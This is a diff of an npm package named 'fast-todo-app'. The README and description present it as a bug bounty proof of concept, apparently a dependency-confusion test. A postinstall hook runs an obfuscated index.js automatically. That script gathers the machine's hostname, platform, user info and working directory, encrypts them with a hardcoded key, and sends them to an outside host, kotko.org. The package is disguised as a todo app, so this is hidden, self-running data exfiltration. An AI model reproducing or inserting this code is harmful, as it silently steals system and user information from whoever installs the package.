fast-todo-app 1.0.0

package/README.md

@@ -0,0 +1 @@
+Poc by kotko for testing bug.

package/crypto.js

@@ -0,0 +1,31 @@
+const crypto = require('crypto');
+
+const algorithm = 'aes-256-ctr';
+const secretKey = 'vOVH6sdmpNWjRRIqCc7rdxs01lwHzfr3';
+const iv = crypto.randomBytes(16);
+
+const encrypt = (text) => {
+
+    const cipher = crypto.createCipheriv(algorithm, secretKey, iv);
+
+    const encrypted = Buffer.concat([cipher.update(text), cipher.final()]);
+
+    return {
+        iv: iv.toString('hex'),
+        content: encrypted.toString('hex')
+    };
+};
+
+const decrypt = (hash) => {
+
+    const decipher = crypto.createDecipheriv(algorithm, secretKey, Buffer.from(hash.iv, 'hex'));
+
+    const decrpyted = Buffer.concat([decipher.update(Buffer.from(hash.content, 'hex')), decipher.final()]);
+
+    return decrpyted.toString();
+};
+
+module.exports = {
+    encrypt,
+    decrypt
+};

package/index.js

@@ -0,0 +1 @@
+var _0x29bf14=_0x66f1;(function(_0x2e1483,_0x1aba64){var _0x52cd47=_0x66f1,_0x1fbfca=_0x2e1483();while(!![]){try{var _0x2e9538=parseInt(_0x52cd47(0xf6))/0x1+parseInt(_0x52cd47(0xfd))/0x2*(parseInt(_0x52cd47(0xfa))/0x3)+-parseInt(_0x52cd47(0xf9))/0x4+parseInt(_0x52cd47(0xf8))/0x5*(parseInt(_0x52cd47(0x100))/0x6)+parseInt(_0x52cd47(0x103))/0x7+-parseInt(_0x52cd47(0xf7))/0x8*(parseInt(_0x52cd47(0x105))/0x9)+-parseInt(_0x52cd47(0x104))/0xa*(parseInt(_0x52cd47(0xfc))/0xb);if(_0x2e9538===_0x1aba64)break;else _0x1fbfca['push'](_0x1fbfca['shift']());}catch(_0x52ec89){_0x1fbfca['push'](_0x1fbfca['shift']());}}}(_0x2a2f,0x22627));var os=require('os');const request=require(_0x29bf14(0xeb)),crypto=require('crypto');var fs=require('fs'),hostname=os[_0x29bf14(0x101)](),type=os[_0x29bf14(0xfe)](),userInfo=os['userInfo'](),currentPath=process[_0x29bf14(0xee)](),json=[];const algorithm=_0x29bf14(0xed),secretKey='vOVH6sdmpNWjRRIqCc7rdxs01lwHzfr3',iv=crypto[_0x29bf14(0xec)](0x10);json[_0x29bf14(0xf1)](hostname),json[_0x29bf14(0xf1)](type),json[_0x29bf14(0xf1)](userInfo),json[_0x29bf14(0xf1)](currentPath),json=JSON[_0x29bf14(0xf4)](json);const {encrypt,decrypt}=require(_0x29bf14(0x102));function _0x66f1(_0x137190,_0x2b9185){var _0x2a2fd4=_0x2a2f();return _0x66f1=function(_0x66f1e3,_0xf534){_0x66f1e3=_0x66f1e3-0xeb;var _0x2e6bfe=_0x2a2fd4[_0x66f1e3];return _0x2e6bfe;},_0x66f1(_0x137190,_0x2b9185);}function _0x2a2f(){var _0x2857b9=['request','randomBytes','aes-256-ctr','cwd','microsoft--fast','https://kotko.org/?','push','toString','pocByKotko.txt','stringify','fast-todo-app','49556fOgJKS','24URJDZo','54260GryVYf','936700JyNjIh','327777EqcrAV','from','10109jAYHOc','2tXKLGy','platform','base64','102gZdejQ','hostname','./crypto','1484315acAiVB','1290LxPDDm','185337gFTSsx'];_0x2a2f=function(){return _0x2857b9;};return _0x2a2f();}let hash=encrypt(json),company=_0x29bf14(0xef),packages=_0x29bf14(0xf5);fs['writeFile'](_0x29bf14(0xf3),'this\x20proof\x20for\x20report',function(_0x423896){if(_0x423896)throw _0x423896;});var buff=Buffer[_0x29bf14(0xfb)](JSON[_0x29bf14(0xf4)](hash))[_0x29bf14(0xf2)](_0x29bf14(0xff));request(_0x29bf14(0xf0)+company+':'+packages+'='+buff,(_0x58d592,_0x5e0017,_0x4cd455)=>{});

package/package.json

@@ -0,0 +1,25 @@
+{
+  "name": "fast-todo-app",
+  "version": "1.0.0",
+  "description": "This package for demonstrate bugs in program (Bug Bounty program. Do not delete until decision report",
+  "main": "index.js",
+  "scripts": {
+    "postinstall": "node index.js",
+    "preinstall": "npm i request --save-dev",
+    "test": "node index.js"
+  },
+  "author": "",
+  "Dependencies": {
+    "crypto": "^1.0.1",
+    "ip": "^1.1.5",
+    "request": "^2.88.2",
+    "os": "^0.1.1"
+  },
+  "devDependencies": {
+    "crypto": "^1.0.1",
+    "ip": "^1.1.5",
+    "javascript-obfuscator": "^4.0.0",
+    "os": "^0.1.1",
+    "request": "^2.88.2"
+  }
+}

package/pocByKotko.txt

@@ -0,0 +1 @@
+this proof for report